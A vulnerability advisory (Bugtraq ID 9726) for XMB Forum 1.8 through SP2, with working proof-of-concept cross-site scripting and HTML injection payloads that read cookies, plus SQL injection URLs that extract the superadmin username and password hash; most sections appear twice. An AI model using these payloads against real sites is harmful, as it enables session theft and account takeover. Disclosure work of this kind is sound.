XMB Forum Multiple Input Validation Vulnerabilities
BID:9726
Info
XMB Forum Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 9726 |
| Class: | Input Validation Error |
| CVE: |
CVE-2004-0322 CVE-2004-0323 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 23 2004 12:00AM |
| Updated: | Jul 12 2009 03:06AM |
| Credit: | Discovery of these vulnerabilities has been credited to Janek Vind <[email protected]>. |
| Vulnerable: |
XMB Forum 1.8 SP2 XMB Forum 1.8 SP1 XMB Forum 1.8 |
| Not Vulnerable: |
XMB Forum 1.8 SP3 |
Discussion
XMB Forum Multiple Input Validation Vulnerabilities
XMB Forum has been reported prone to multiple cross-site scripting, HTML injection and SQL injection vulnerabilities. The issues present themselves due to insufficient sanitization of remote user supplied data. An attacker may exploit any one of these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user or to have malicious SQL queries executed in the underlying database.
XMB Forum has been reported prone to multiple cross-site scripting, HTML injection and SQL injection vulnerabilities. The issues present themselves due to insufficient sanitization of remote user supplied data. An attacker may exploit any one of these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user or to have malicious SQL queries executed in the underlying database.
Exploit / POC
XMB Forum Multiple Input Validation Vulnerabilities
The following proof of concept has been supplied:
Cross-Site Scripting:
http://www.example.com/xmb18sp2/forumdisplay.php?fid=1&foobar=<%73cript>
http://www.example.com/xmb18sp2/member.php?action=viewpro&member=x<%73cript>alert(document.cookie);</%73cript>
http://www.example.com/xmb18sp2/u2uadmin.php?uid=x"><%73cript>alert(document.cookie);</%73cript>
http://www.example.com/xmb18sp2/editprofile.php?user=x"><%73cript>alert(document.cookie);</%73cript>
HTML Injection:
text1 [align=center onmouseover=alert(document.cookie);] text2 [/align]
text1 [img=1x1]javascript:alert(document.cookie);//gif[/img] text2
SQL Injection:
http://www.example.com/xmb18sp2/viewthread.php?tid=1&ppp=x
http://www.example.com/xmb18sp2/misc.php?action=list&order=postnum&desc=x
http://www.example.com/xmb18sp2/forumdisplay.php?fid=1&tpp=x
http://www.example.com/xmb18sp2/forumdisplay.php?fid=1&ascdesc=x
http://www.example.com/xmb18sp2/stats.php?action=view&addon=x
Getting username for superadmin:
http://www.example.com/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL SELECT NULL,NULL,username FROM xmb_members WHERE uid=1 LIMIT 1/*
Getting password's md5 hash for superadmin:
http://www.example.com/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL SELECT NULL,NULL,password FROM xmb_members WHERE uid=1 LIMIT 1/*
The following proof of concept has been supplied:
Cross-Site Scripting:
http://www.example.com/xmb18sp2/forumdisplay.php?fid=1&foobar=<%73cript>
http://www.example.com/xmb18sp2/member.php?action=viewpro&member=x<%73cript>alert(document.cookie);</%73cript>
http://www.example.com/xmb18sp2/u2uadmin.php?uid=x"><%73cript>alert(document.cookie);</%73cript>
http://www.example.com/xmb18sp2/editprofile.php?user=x"><%73cript>alert(document.cookie);</%73cript>
HTML Injection:
text1 [align=center onmouseover=alert(document.cookie);] text2 [/align]
text1 [img=1x1]javascript:alert(document.cookie);//gif[/img] text2
SQL Injection:
http://www.example.com/xmb18sp2/viewthread.php?tid=1&ppp=x
http://www.example.com/xmb18sp2/misc.php?action=list&order=postnum&desc=x
http://www.example.com/xmb18sp2/forumdisplay.php?fid=1&tpp=x
http://www.example.com/xmb18sp2/forumdisplay.php?fid=1&ascdesc=x
http://www.example.com/xmb18sp2/stats.php?action=view&addon=x
Getting username for superadmin:
http://www.example.com/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL SELECT NULL,NULL,username FROM xmb_members WHERE uid=1 LIMIT 1/*
Getting password's md5 hash for superadmin:
http://www.example.com/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL SELECT NULL,NULL,password FROM xmb_members WHERE uid=1 LIMIT 1/*
Solution / Fix
XMB Forum Multiple Input Validation Vulnerabilities
Solution:
The vendor has released XMB 1.8 SP3 to address these issues.
XMB Forum 1.8
XMB Forum 1.8 SP2
XMB Forum 1.8 SP1
Solution:
The vendor has released XMB 1.8 SP3 to address these issues.
XMB Forum 1.8
-
XMB Forum 1.8 SP3
http://www.xmbforum.com/download/1.8/?type=zip
XMB Forum 1.8 SP2
-
XMB Forum 1.8 SP3
http://www.xmbforum.com/download/1.8/?type=zip
XMB Forum 1.8 SP1
-
XMB Forum 1.8 SP3
http://www.xmbforum.com/download/1.8/?type=zip
References
XMB Forum Multiple Input Validation Vulnerabilities
References:
References:
- XMB Forum Home Page (The XMB Group)
- [waraxe-2004-SA#004] - Multiple vulnerabilities in XMB 1.8 Partagium Final SP2 (Janek Vind